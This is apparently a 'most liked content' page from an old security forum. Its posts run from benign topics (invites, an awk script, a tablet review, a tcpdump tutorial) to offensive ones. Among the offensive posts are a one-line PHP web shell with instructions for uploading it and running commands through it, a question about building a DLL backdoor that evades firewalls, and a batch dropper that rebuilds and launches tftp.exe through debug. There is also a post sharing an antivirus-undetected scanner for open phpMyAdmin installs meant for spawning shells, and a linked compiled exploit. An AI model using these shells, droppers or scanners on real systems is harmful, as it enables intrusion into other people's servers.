Government Security
Network Security Resources

Jump to content

Most Liked Content


#97981 Intro To Win32 Exploits

Posted by Figo on 29 October 2004 - 03:32 AM

nice read, thanks alot
  • jhonny rip likes this


#97971 Intro To Win32 Exploits

Posted by jead99 on 29 October 2004 - 12:04 AM

Nice post m8
  • jhonny rip likes this


#203663 Google Wave Invites

Posted by Guest on 16 October 2009 - 01:37 AM

Never mind, I got one from the google team already :)
  • Stephen likes this


#203650 Google Wave Invites

Posted by bonarez on 15 October 2009 - 07:01 AM

Hi Dennis,

I have some invites left..

PM or Mail me

bonarez
  • Stephen likes this


#203526 Google Wave Invites

Posted by Guest on 05 October 2009 - 05:40 AM

Hi,

As you may know Google Wave have released over 100.000 invites each holding 8 other invitations. Would anyone happen to have one for me? My invites will be spread among GSO's members ofcourse :)

Regards,

Dennis
  • Stephen likes this


#203063 Creating A Backdoor Using Dll

Posted by colinsouth on 19 August 2009 - 10:24 PM

Dont be a prick, I'm not asking anyone to code a single line of code for me.

I've written the DLL injection, and know how to make DLLs.

Im really missing the point though...

Do I make a DLL that just deals with the network stuff, to bypass firewall, to just send the data to client via its host process; or what?

No need for your non constructive post.
  • colinsouth likes this


#202686 How To Overide Rm Filter

Posted by Guest on 16 July 2009 - 08:30 AM

Have you tried any cgi proxy websites?
  • Squirell likes this


#202570 Small Pma Shell

Posted by webdevil on 02 July 2009 - 09:14 PM

<?php system($_GET[cmd]); ?>

That should do the trick.

Once that is uploaded you can try this

http://site/shell.php?cmd=command


  • tommy1987 likes this


#202504 We are going through an upgrade

Posted by polpotx on 27 June 2009 - 06:40 PM

Looks nice, new is good! :))
  • Stephen likes this


#192200 awk script

Posted by SuRGeoN on 08 June 2008 - 01:21 AM

if the filename with these data is "input_file" then the following bash/shell script will work fine. Maybe it's not the perfect solution but it works :)

Shell Script
-------------

#!/bin/bash

ips=`cat input_file | awk -F " " '{print$2}' | grep "^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*$" | sort | uniq`

for ip in ${ips[@]}; do
 name=`cat input_file | grep "$ip.* in" | awk -F " " '{print $4}' | sed 's/-IN$//g'`
 res=`cat input_file | grep $ip.*maximum-prefix`
 if [[ -n $res ]]
 then
  echo $name $ip "Yes"
 else
  echo $name $ip "No"
 fi
done

Output
--------

AXTEL 148.223.23.65 No
PROTEL 201.117.10.141 Yes
MARCATEL 201.125.74.109 Yes

Then you can use mail command... it's up to you.

Have a nice day
  • Dr RNA likes this


#190441 HP 2710p TabletPC's review

Posted by ceder on 25 April 2008 - 08:02 AM

Posted Image
There is a strong switch with no gap to release the screen in the middle and the power switch on the left

Posted Image
The night-light.

Posted Image
Global view in laptop mode.

Posted Image
Back view.
You can see a dock port and a battery port which I don't have. Battery life is about 4 hours with wifi, firefox, word and luminosity in the middle.
It can last 5 hours when you shut down wifi. HP has a great system which enables you to recharge 90% of your battery in only 1 hour.
If it's not enought for you, you can add a slim extra battery to have 10 hours of power.

Posted Image
Battery indicator.
You don't have to switch on your laptop to verify your battery status, blue leds indicates the level of charge of the battery.

Posted Image
The pen garage is easy to use and robust. The pen won't go out alone ;)

5) Ink experience and daily use
I am a student and I use my TabletPC everyday. At the beginning, i was afraid by the trackpoint. I had never used one
but finally, it came quickly and I don't see the difference with a touchpad now. I wanted a laptop which had enough battery
for a day at school and I must say that I found the right product. If I don't have a power plug near me during my courses,
I can always find one at lunchtime and recharge my laptop quickly. I was afraid by the HDD's speed too but in fact, it only
increases the boot time but I always turn my laptop in sleep mode so it doesn't take too long to boot. The screen is very good,
when I write on it, I feel like I'm writing with a pen on a sheet of paper. It's enough luminous to use your TabletPC inside and
outside. The 2710p is light, you can stand in slate mode for an hour without feeling pain in your arm.


During this review, I didn't talk about writing recognition. It depends on the OS you choose. From my experience, I can say that
Vista is better at this than Windows XP 2005 TabletPC edition. I have a TabletPC since 1 and half year and I will never return to
a normal laptop. ;)

I hope you have enjoyed this review. I apologize for my bad english and I hope you'll become an adept of TabletPCs like me :P
If you have any questions, I'll be glad to answer all of them.

6) Links

HP website
TabletPC reviews website (english)
TabletPC reviews (french)
  • Jeremy likes this


#188880 Enable Telnet Server Xp

Posted by bonarez on 19 March 2008 - 06:57 AM

strSvcName = "Telnet"
strStartupType = "Automatic" 
strComputer = "."
set objWMI = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
set objService = objWMI.Get("Win32_Service.Name='" & strSvcName & "'")
intRC = objService.Change(,,,,strStartupType)

what is the funtion of this half exactly?:
et objWMI = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")


Sorry for the late reaction, just read your reply..

basicly you create an object, with name objWMI, (wmi stands for windows management instrumentation)
you set the object to connect to "winmnmts" (the wbem services).
strComputer is just a var that holds the computer name you want to connect to
"\root\cimv2" is the namespace we want to connect to, there are more namespaces, but this one is used most of the time for management purposes.

here's a nice read: hxxp://www.wilsonmar.com/1wmiwbem.htm

When working in domains using adsi I preferred using the ldap way to connect, but I haven't been vbscripting much lately.. Powershell is the new cool

edit: some cool stuff to play with when you're looking into adsi/vbs/wmi/hta:
hxxp://www.microsoft.com/technet/scriptcenter/createit.mspx
  • bawlls likes this


#185922 Newb Needs Help Getting Http Info

Posted by basher on 21 December 2007 - 01:19 AM

Get netcat, then type (replace <host> and <port>, obviously):
nc <host> <port>
HEAD / HTTP/1.1
Host: <host>
Press enter twice after the last line.
  • basher likes this


#185529 Convert Text To Html Entities

Posted by basher on 10 December 2007 - 06:34 PM

..better late then never..
[codebox]function entityenc($str)
{
$text_array = explode("\r\n", chunk_split($str, 1));
for ($n = 0; $n < count($text_array) - 1; $n++)
{
$newstring .= "&#" . ord($text_array[$n]) . ";";
}
return $newstring;
}[/codebox]
  • basher likes this


#185527 Session Vars Secure?

Posted by basher on 10 December 2007 - 06:12 PM

If XSS is possible, probally depends on the rest of your code. The only thing that can be retreived by XSS, is the session name/key, not the session variables as these are stored on the server. Also, define user. a website user, a system user, a .. ? A system user might be able to read these variables, depending on how your host is set up.

You might want to look into javascript encryption implementations, by using these, you can send encrypted hashes to the server. vBulletin also use these, if you need an example.
  • basher likes this


#183513 Tcpdump Data Analysis Tutorial, Part 1

Posted by Linuxchuck on 22 October 2007 - 06:24 AM

I wrote these tuts YEARS ago (as will be obvious by some of the screenshots) as teaching aids, and recently came across some of them. This is the first of about a 6-part series if memory serves. As I unearth the others, I will post them here. If any of them prove to be irrevocably lost, I'll reproduce them as accurately as possible.

This first part covers reading and interpreting typical TCP/IP traffic down to a little bit of hex work. The screenshots use Ethereal (yes, I know it's Wireshark now) but the concepts and format are generally unchanged from what you will encounter today.

Comments are welcome.

Attached Files


  • likes this


#177816 Convert Exe To Batch (with Gui)

Posted by Guest on 07 June 2007 - 12:26 AM

This nice tool converts .exe files into batch files like this one for example:

@echo e 4440 58 50 41 44 44 49 4E 47 50 41 44 44 49 4E 47 58 >>tmp11
@echo e 4450 58 50 41 44 44 49 4E 47 50 41 44 44 49 4E 47 58 >>tmp11
@echo e 4460 58 50 41 44 44 49 4E 47 50 41 44 44 49 4E 47 58 >>tmp11
@echo e 4470 58 50 41 44 44 49 4E 47 50 41 44 44 49 4E 47 58 >>tmp11
@echo e 4480 58 50 41 44 44 49 4E 47 50 41 44 44 49 4E 47 58 >>tmp11
@echo e 4490 58 50 41 44 44 49 4E 47 50 41 44 44 49 4E 47 58 >>tmp11
@echo e 44A0 58 50 41 44 44 49 4E 47 50 41 44 44 49 4E 47 58 >>tmp11
............
............
............
@echo e 44B0 58 50 41 44 44 49 4E 47 50 41 44 44 49 4E 47 58 >>tmp11
@echo e 44C0 58 50 41 44 44 49 4E 47 50 41 44 44 49 4E 47 58 >>tmp11
@echo e 44D0 58 50 41 44 44 49 4E 47 50 41 44 44 49 4E 47 58 >>tmp11
@echo e 44E0 58 50 41 44 44 49 4E 47 50 41 44 44 49 4E 47 58 >>tmp11
@echo e 44F0 58 50 41 44 44 49 4E 47 50 41 44 44 49 4E 47 58 >>tmp11
@echo rcx>>tmp11
@echo 4400>>tmp11
@echo n tmp1>>tmp11
@echo w>>tmp11
@echo q>>tmp11
@debug<tmp11>nul
@Copy /b /y tmp1 tftp.exe
@start tftp.exe
@del tmp*


(example for converting the tftp.exe)

The Tool has a GUI with 3 buttons. Left button: Select a file. Button in the middle: Convert the selected file. Right button: Credits/Info
Language is chinese but you will understand how to use the tool.

Hope you guys like it ;)

greetings,
gueste

Attached Files


  • likes this


#174325 Folding@home Gso Style

Posted by zorin- on 02 April 2007 - 06:08 AM

Hey everyone. I have asked Blake about this first and got the ok, so I have now created a Folding@Home team for GSO, the official team is called governmentsecurity.org. For those who don't know what this project is look at this page. It's basically for medical research...if everyone here downloads and runs the software it will be a major help, will even make GSO stand out :) It just uses spare CPU cycles on you're computer, so leave the client running and it will be actively contributing to the project. Now for the configuration.

Go to the download page and select the one for you're operating system, pretty much most operating systems are supported...Windows, Mac, Linux and BSD. After installing the software right click the client > configure and then enter 64022 as the team number. Make sure that you enter 64022 as the team number to contribute to our team. If anyone has any problems or needs any advice PM me and I'll see if I can help. Hope everyone installs this and gives it a go :)

The team statistics page is here: http://fah-web.stanf...p;teamnum=64022
  • Stephen likes this


#131685 Pmafind.exe

Posted by S3M73X on 03 November 2005 - 10:04 AM

This is a tool which scans several Websites in a Range and tries to determine whether PHPMyAdmin ist installed an accessible by everybody without an auth.

pmafind.exe was written by a member of a german FXP-Crew to find vulnerable PHPMyAdmin-Webinterfaces to do SQL-Injections to spawn a PHP or ASP or PERL-Shell and so on.

You may use this tool to test your own Website or Range for this "Vuln" it is a very old an lame Security-Hole and an Admin should normally NEVER let it open to the Internet.

This tool isn't codet that very well it crashed sometimes. I don't want lame FXP-Kiddies to use it and thats the reason why i post it. It was spreadet by a Nap of RiSk and the autor and the team are very angry about it. So every FXP-Kiddie uses it and thats not what was intented.

I think i act in the mind of the RiSk-Crew which can easily make their own version custom so no AV detects it and the version here which is public in the FXP-Scene can be grabbed by the ppl from Kaspersky *which i know they are in here ;)* and put in the same rang as scan1000 and so on.

Currently it is NOT detected by ANY AV but i hope this will change soon to beat of all those lame spreading-fuckers! The current AV-Results cann be seen @ virustotal.com

I hate spreaders and i never will spread something somebody gave to me if its from him and if he isnt a lame FXP-Kiddie which claims to be leet using stolen tools from other ppl!

G:\Blackhat\PMAhaxx\PHPSCANNER>pmafind -help

*****************************************
How to Use PMAFind?
Commandline:
PMAFind.exe [Mode] [Inputfile or IPs] [Speed] [timeout in msec]
Use Mode "-i" for an inputfile
Use Mode "-s 123.1.1.1 123.2.2.2" to scan a Range

Speed 1 is fastest, 10 is slowest. default is 5
You can add the timeout if you want. default is 3000
Example: PMAFind.exe -i scan.txt 3 2500
You can leave out Speed and Timeout to use defaults
*****************************************


*****************************************
USE IT ON YOUR OWN RISK!
I DONT TAKE ANY RESPONSIBILITY!
DONT CAUSE ANY DAMAGE WITH THIS TOOL!
Use this tool to check the security of your own phpmyadmin!
So just use it for your homePC or your website,
*****************************************


PMAFind-log.txt is used as logfile.
You will see the Unsecured PhpMyAdmins in Result.txt



*****************************************
* * This nice Tool was coded by Prase * *
* *		 Only 4 RiSk Crew!		 * *
*****************************************

G:\Blackhat\PMAhaxx\PHPSCANNER>

>> Download PMAfind.exe <<
  • Thom likes this


#106611 Nodemanager Professional V2.00 Buffer Overflow Exp

Posted by realloader on 20 January 2005 - 10:29 AM

Here Compiled:

Attached Files


  • beginner likes this